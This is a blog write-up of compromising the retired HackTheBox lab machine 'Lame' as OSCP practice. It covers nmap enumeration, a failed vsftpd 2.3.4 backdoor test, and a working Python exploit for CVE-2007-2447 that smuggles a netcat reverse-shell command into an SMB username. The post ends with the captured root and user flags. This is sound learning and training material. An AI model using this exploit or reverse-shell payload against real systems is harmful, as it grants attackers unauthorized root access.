Greetings friends! I was advised by some of my fellow OSCP aspirants to check out some of the retired HackTheBox machines in preparation for starting my PWK course. So I went ahead and coughed up the dough to buy a HTB VIP account, and got to work.
Having been informed that Metasploit use would be restricted in the OSCP exam, I decided to challenge myself to hack each machine without the use of Metasploit, so that I would be better prepared for the test.
I was given this handy guide to OSCP-Like HTB Boxes, and decided to start from the top:
The first box in the Linux list is called “Lame,” and according to the ratings on HTB, it looked fairly easy:
I fired up my Kali VM and got to work…
First I needed to know what services were running on the machine. I used the following
nmap command to execute a scan which would run a series of scripts and attempt to detect the version information for the various services, as well as the OS of the host:
nmap -A 10.10.10.3 -oA Lame-Script-Scan
The results included a significant amount of information (I've cropped them a little to focus on the important data):
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-19 03:43 EDT Nmap scan report for 10.10.10.3 Host is up (0.079s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) [...] 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) [...] 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) [...] Host script results: |_clock-skew: mean: 3h48m37s, deviation: 0s, median: 3h48m37s | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | NetBIOS computer name: | Workgroup: WORKGROUP\x00 |_ System time: 2019-04-19T03:32:30-04:00 |_smb2-time: Protocol negotiation failed (SMB2) [...] Nmap done: 1 IP address (1 host up) scanned in 63.65 seconds
As I've noted before, I've been working through Georgia Weidman's Penetration Testing: A Hands-On Introduction to Hacking, and one of the exploits covered in the book relates to the
vsftpd 2.3.4 service running on this machine, so I made a mental note to check that service for vulnerabilities. I also noticed that there are two other services that might be vulnerable:
OpenSSH 4.7p1 and
Samba smbd 3.0.20.
Considering that OpenSSH is the least likely of the three to have any vulnerabilities, I decided to put it lower on my list of target services. I chose to look at the vsFTPd service first, since I already had prior knowledge of a possible exploit for that service. If that didn't pan out, I would aim at the Samba service next.
Very Secure FTP (vsFTPd) service had an ironic vulnerability in version 2.3.4 wherein a malicious programmer included a backdoor that would spawn a root shell listening on port 6200. Once the backdoor was discovered, the software was patched and a new version 2.3.4 was released without the backdoor. Testing for the backdoor is a simple matter: it is triggered by adding a smiley face
:) to the end of the username when logging in.
root@kali:~# ftp 10.10.10.3 Connected to 10.10.10.3. 220 (vsFTPd 2.3.4) Name (10.10.10.3:root): anon:) 331 Please specify the password. Password: [invisible]
Once logged in with these credentials, if the service was vulnerable, I should have been able to connect to a newly-opened port 6200 with a root shell.
root@kali:~# nc 10.10.10.3 6200 pwd whoami :(
It was clear to me that the attack was unsuccessful. Apparently, this machine was using the patched version of vsFTPd v2.3.4. Time to check the Samba service…
The first thing I did when approaching the Samba service was to check to see if there were any exploits already installed in Kali. I might not be using Metasploit to attack the target, but there's no reason I couldn't use
searchsploit to quickly find available exploits.
root@kali:~# searchsploit samba 3.0.20 -w ----------------------------------- -------------------------------------------- Exploit Title | URL ----------------------------------- -------------------------------------------- Samba 3.0.20 < 3.0.25rc3 - 'Userna | https://www.exploit-db.com/exploits/16320 Samba < 3.0.20 - Remote Heap Overf | https://www.exploit-db.com/exploits/7701 ----------------------------------- -------------------------------------------- Shellcodes: No Result
Only two results were returned, and the second result in the list only applied to Samba versions prior to 3.0.20 (unless I was mistaken and the
< was inclusive). But the first result seemed to target versions between 3.0.20 and 3.0.25rc3, which meant it could work against my target. I looked for more information on the website listed and discovered that this exploit was covered by CVE-2007-2447.
None of the links I checked on the CVE site provided any exploit code or tools, so I went to Google and searched for
CVE-2007-2447 exploit -metasploit (including that last bit to avoid results for using Metasploit). In the results, I discovered a blog post that explained the vulnerability and included a link to a GitHub repository where a proof-of-concept (PoC) exploit could be found.
The exploit required Python 2.7 and the
pysmb library, so I created a virtual environment and installed all the necessary tools, then created a copy of the script. I opened it up with
vi and took a gander. The original code used a payload that I felt was needlessly complex. All I wanted was a simple
netcat reverse shell, so I updated the script:
#!/usr/bin/python # -*- coding: utf-8 -*- # From : https://github.com/amriunix/cve-2007-2447 # case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/ import sys from smb.SMBConnection import SMBConnection def exploit(rhost, rport, lhost, lport): payload = "nc %s %s -e /bin/sh" % (lhost, lport) username = "/=`nohup " + payload + "`" conn = SMBConnection(username, "", "", "") try: conn.connect(rhost, int(rport), timeout=1) except: print("[+] Payload was sent - check netcat !") if __name__ == "__main__": print("[*] CVE-2007-2447 - Samba usermap script") if len(sys.argv) != 5: print( "[-] usage: python %s <RHOST> <RPORT> <LHOST> <LPORT>" % (sys.argv) ) else: print("[+] Connecting !") rhost = sys.argv rport = sys.argv lhost = sys.argv lport = sys.argv exploit(rhost, rport, lhost, lport)
With my script prepared, the next step was to test it out. First, I needed to set up a netcat listener to catch the reverse shell:
root@kali:~# nc -lvp 4444 listening on [any] 4444 ...
With that taken care of, it was time to run the script:
(venv) root@kali:~# python exploit.py 10.10.10.3 139 10.10.14.7 4444 [*] CVE-2007-2447 - Samba usermap script [+] Connecting ! [+] Payload was sent - check netcat !
With the script executed, I went back to my netcat listener to see if I'd gotten the shell, and sure enough I had!
root@kali:~# nc -lvp 4444 listening on [any] 4444 ... 10.10.10.3: inverse host lookup failed: Unknown host connect to [10.10.14.7] from (UNKNOWN) [10.10.10.3] 49754
I used the
id command to see which account I'd logged into. The response thrilled me:
I was logged in as root! Now it was a simple matter to find the root.txt and user.txt flags. (I added the
#> in the following lines to denote which commands I typed.)
#> ls root -l total 16 drwxr-xr-x 2 root root 4096 May 20 2012 Desktop -rwx------ 1 root root 401 May 20 2012 reset_logs.sh -rw------- 1 root root 33 Mar 14 2017 root.txt -rw-r--r-- 1 root root 118 Apr 19 01:18 vnc.log #> cat root/root.txt 92caac3be140ef409e45721348a4e9df <--( root flag ) #> ls home -l total 16 drwxr-xr-x 2 root nogroup 4096 Mar 17 2010 ftp drwxr-xr-x 2 makis makis 4096 Mar 14 2017 makis drwxr-xr-x 2 service service 4096 Apr 16 2010 service drwxr-xr-x 3 1001 1001 4096 May 7 2010 user #> ls home/makis -l total 4 -rw-r--r-- 1 makis makis 33 Mar 14 2017 user.txt #> cat home/makis/user.txt 69454a937d94f5f0225ea00acd2e84c5 <--( user flag )
Bingo! I had both flags, and I'd rooted the box!
Having successfully rooted my first HTB target, I felt elated. Granted, this was one of the simplest targets on the service, but it feels good to get a win, and this proved to me that my training was paying off.
I'll continue to post write-ups of future HTB challenges, as I work through each machine in the OSCP-Like list. I sincerely hope that these machines will help me prepare for my upcoming PWK course and OSCP certification test. This machine was a fairly simple challenge, and it feels great to say I completed it without using Metasploit! But I know that I'll be facing even tougher challenges in the future.
I'll be sure to share all of my adventures here, of course. So stay tuned!